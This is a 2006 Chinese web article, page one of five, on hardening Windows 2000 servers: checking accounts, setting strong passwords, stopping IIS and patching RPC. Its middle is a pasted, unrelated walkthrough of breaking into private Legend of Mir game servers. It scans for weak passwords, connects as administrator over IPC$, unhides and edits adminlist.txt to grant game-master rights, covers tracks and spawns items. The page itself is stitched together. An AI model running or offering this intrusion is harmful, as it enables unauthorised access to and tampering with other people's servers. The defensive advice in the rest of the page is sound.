会员名称:  密码:   验证码:     会员注册  忘记密码? 
设为首页
加入收藏
返回首页
媒体资讯>> 业界资讯 - 会展动态 - 竞赛&活动 - IT互联网  媒体学院>> 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用  作品赏析>> 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计  媒体工作室>> 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象  人物访谈>> 人物访谈 - 华夏新锐  媒体杂志>> 媒体杂志  素材图库>> 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标  酷站赏析>> 韩国网站 - 国外网站 - 国内网站  会员中心>> 会员注册 - 会员登陆
当前位置:华夏媒体 - > 媒体学院 - > 服务器 - > 系统综合 - > 服务器安全配置精华技巧(高级)
   
   
   
服务器安全配置精华技巧(高级) 服务器安全配置...  [系统...]
More... 
   
网络协议X档案全集(十) 网络协议X档案...  [其它...]
不可忽视的BIOS参数设置 不可忽视的BIO...  [其它...]
微软IE浏览器非常规修改全攻略(上) 微软IE浏览器非...  [其它...]
微软IE浏览器非常规修改全攻略(下) 微软IE浏览器非...  [其它...]
网管十招 网管十招  [其它...]
微软安全问题 源自OS和IE中集成RSS 微软安全问题 ...  [其它...]
修改注册表使电脑更安全 修改注册表使电...  [其它...]
利用注册表管理IP地址 利用注册表管理...  [其它...]
有关IIS HACK的一些方法整理 有关IIS HACK的...  [其它...]
More 
服务器安全配置精华技巧(高级)
编辑:华夏媒体     作者:未知     来源:网络     时间:2006-07-29     总浏览量:1568
文字大小:[      ]     文字颜色:      双击滚屏/单击停止

[上一页] [1] [2] [3] [4] [5] [下一页] 



  一:了解一下帐号的含义 

  先运行CMD 

  然后输入:net user(回车健) 

  这样后,会显示一例帐号 

  再查看管理员帐号 

  输入:net localgroup administrators 

  这就是查看administrators组的用户。这样的话若是人家用隐藏帐号的方法也会查出来! 

  系统自带的超级管理员帐号是administrator 

  记住这里显示出来多个帐号不明的帐号。哪就证明你机器不安全了。若出现在的帐号都是你自已的帐号。哪百分之四十你机器未被入侵 

  帐号安全: 

  二:密码篇 

  你若觉得自已的帐号密码是123456哪么不出三秒人家就到你机上一游了。 

  修改密码方法,在DOS下修改更安全 

  输入net user 帐号名 需修改密码(然后回车健) 

  一般密码设复杂一点!   

  溢出: 

  2000服务器版装下去会自动装IIS的,若你觉得IIS没有什么用就停止。IIS地址:开始》》程序》》管理工具》》Internet信息服务(这个就是IIS)你将他开启。上面按停止!这样就进一步安全了。不过若IIS你需要用的话,哪么记得打目前最新的补丁SP4哦。     

  RPC溢出。大家记住,试试telnet IP 135看看有没有开着。若是开着。请打RPC补丁。若找不到。干脆装个_blank">防火墙,将135端屏蔽! 
  
  大家千万要记住。入侵系统最关点的就是要帐号密码。保护好自已帐号与密码。安全一定属于你! 

  本文引起广大4f拥有者的注意 

  入侵传奇私服/充当非法GM。 

  首先,我得声明,我写本文并不是教大家如何去黑4f,只是想以本文引起广大4f拥有者的注意 

  ,提高自己的网管水平。 

  我爱玩游戏,但却玩得很菜,也没有时间去玩,只想玩着过瘾,所以,当我开始玩传奇时, 

  虽觉得是好玩,但玩盛大的简直是在受罪,升级慢,没好装备,处处受人欺负。所以,4f是明 

  智的选择,但进去时也没有好装备,也是受人欺负,难道我不可以做gm?试试,folling me! 

  找来一大堆4f的ip,开个x-scan扫吧。有了,还真不少,都是弱口令的,这些网管真菜呀。 

  选好一个,192.168.0.1,go! 

打开cmd, 

  1)c:/>net use 192.168.0.1ipc$ /user:administrator 

  连接成功, 

  ok,连上了,成功在望, 

  2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt 

  系统找不到指定的文件。 

  没有?不可能吧?唔,一定是隐藏了,没关系,再来, 

  3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt 

  没有提示,成功了, 

  这次连复制也不用了,直接改吧, 

  4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt 

  会打开个介面,看看里面有哪些gm,加个吧,自己记得就行了,改完保存退出 

  5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt 

  把adminilist.txt还原成只读隐藏, 

  好了,大功告成,快打扫脚印吧,别让人发现被入侵了, 

  现在,就等着系统重启了,等不及的话就在第五步让它重启,不过这样太危险了,还是等吧 

  , 

  第二天注册个帐号,新建个之前加的人名进去, 

  /who 

  当前150人在线 

  哈,我就是gm了。赶快把自己升级, 

  @level -1 

  升级成功,255级,哈哈 

  再造出想要的装备,想要什么尽情造吧, 

  重复上面的把自己从adminlist.txt里删了,哈哈,好装备到手了,可以玩了 

   

  面记得有位朋友对加强对服务器安全性的解决方法进行了一系列的说明,讲得非常详细,但是我觉得还有很多需要补充的地方.微软的系统是漏洞和补丁著称,真正要对服务器的安全配置确实非常困难,考虑的方面也太多了. 

  今天先讲一个方面的内容了,也算是对前面的朋友的进一步补充吧! 

  前面那位朋友所概述的主要是针对WIN2000系统弱口令的安全设置!他已经说得很仔细了,做到那些,口令这一关差不多了.确实在互联网的时代,口令真的非常重要.我对国外的主机进行了一系列的测试,就拿有弱口令的系统来说,还有不少!其中也包括了不少中小型企业的WEB服务器,E-MAIL,PROXY服务器都有这种低级的错误! 

  如果说你在这方面做得非常的仔细.但你至少还要仔细研究一下你主机现在所运行的有哪些服务,这些服务代表着什么?你应该很清楚!因为现在黑客软件,木马工具,远程控制软件大多是以一种服务的形式运行在你的服务器系统里,一般的_blank">防火墙,杀毒软件对其并没有任何反映的.对于服务形式出现的控制工具.比较难得发现,所以你就必须在服务器里运行的哪些服务非常熟悉.对于陌生或奇怪的服务应该安全设置好. 


[上一页] [1] [2] [3] [4] [5] [下一页] 

打印   收藏   关闭   至顶部  


关于我们 | 联系我们 | 合作伙伴 | 站点地图 | 免责声明 | 版权声明 | 意见建议
版权所有  Copyright © 2005-2006 华夏媒体(Media86.Com). All Rights Reserved .
网站备案号:粤ICP备06055307号